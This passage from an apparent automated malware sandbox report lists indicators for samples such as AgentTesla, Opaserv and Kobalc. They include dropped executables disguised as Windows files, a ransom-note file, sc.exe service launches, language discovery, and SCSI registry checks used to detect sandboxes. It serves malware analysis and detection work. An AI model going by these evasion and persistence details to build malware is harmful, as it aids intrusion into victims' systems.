Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml AgentTesla.exe File opened for modification C:\Program Files\CopyEnable.asp AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\fillandsign.svg AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\ui-strings.js AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\ui-strings.js AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-150_8wekyb3d8bbwe\AppxBlockMap.xml AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\de-DE.mail.config AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-down_32.svg AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe -
Drops file in Windows directory 31 IoCs
description ioc Process File opened for modification C:\WINDOWS\MPREXE.EXE Opaserv.l.exe File created \??\c:\windows\system\winsrv.exe Opaserv.l.exe File opened for modification C:\WINDOWS\CERTCA.EXE Opaserv.l.exe File created C:\Windows\Fonts\wmsncs.exe\:SmartScreen:$DATA Kobalc.exe File created C:\Windows\Maria.doc .exe Process not Found File created C:\WINDOWS\MPREXE.EXE Opaserv.l.exe File opened for modification C:\WINDOWS\COREMAS.EXE Opaserv.l.exe File created C:\WINDOWS\COREMAS.EXE Opaserv.l.exe File opened for modification C:\WINDOWS\D3D12.EXE Opaserv.l.exe File opened for modification C:\Windows\Fonts\wmsncs.exe Kobalc.exe File opened for modification \??\c:\windows\system\msload.exe msload.exe File opened for modification C:\Windows\Maria.doc .exe Process not Found File opened for modification C:\Windows\MSBIND.DLL Opaserv.l.exe File created \??\c:\windows\system\scr.scr Opaserv.l.exe File opened for modification \??\c:\windows\MPREXE.EXE Opaserv.l.exe File opened for modification C:\WINDOWS\BATMETER.EXE Opaserv.l.exe File created C:\WINDOWS\CERTCA.EXE Opaserv.l.exe File created C:\WINDOWS\BATMETER.EXE Opaserv.l.exe File created C:\WINDOWS\D3D12.EXE Opaserv.l.exe File created C:\Windows\NOTEPAD.EXE Process not Found File created \??\c:\windows\system\msload.exe Opaserv.l.exe File opened for modification C:\WINDOWS\CMDKEY.EXE Opaserv.l.exe File created C:\WINDOWS\CMDKEY.EXE Opaserv.l.exe File created C:\Windows\Fonts\wmsncs.exe Kobalc.exe File opened for modification \??\c:\windows\system\scr.scr Opaserv.l.exe File opened for modification \??\c:\windows\system\winsrv.exe Opaserv.l.exe File opened for modification \??\c:\windows\system\scr.scr msload.exe File opened for modification \??\c:\windows\system\msload.exe Opaserv.l.exe File opened for modification \??\c:\windows\MPREXE.EXE msload.exe File opened for modification \??\c:\windows\system\winsrv.exe msload.exe File created C:\Windows\NOTEPAD.EXE Process not Found -
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4584 sc.exe 3736 sc.exe 1020 sc.exe 1316 sc.exe 3772 sc.exe 1248 sc.exe 4292 sc.exe 3552 sc.exe 2948 sc.exe 1200 sc.exe 5056 sc.exe 1728 sc.exe 4720 sc.exe 1728 sc.exe 5052 sc.exe 880 sc.exe 3860 sc.exe 2940 sc.exe 4804 sc.exe 4304 sc.exe 2896 sc.exe 3308 sc.exe 676 sc.exe 1644 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 1 IoCs
pid pid_target Process procid_target 4292 712 WerFault.exe 664 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winlogon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000a000000023d6c-616.dat nsis_installer_1 behavioral1/files/0x000a000000023d6c-616.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key value queried 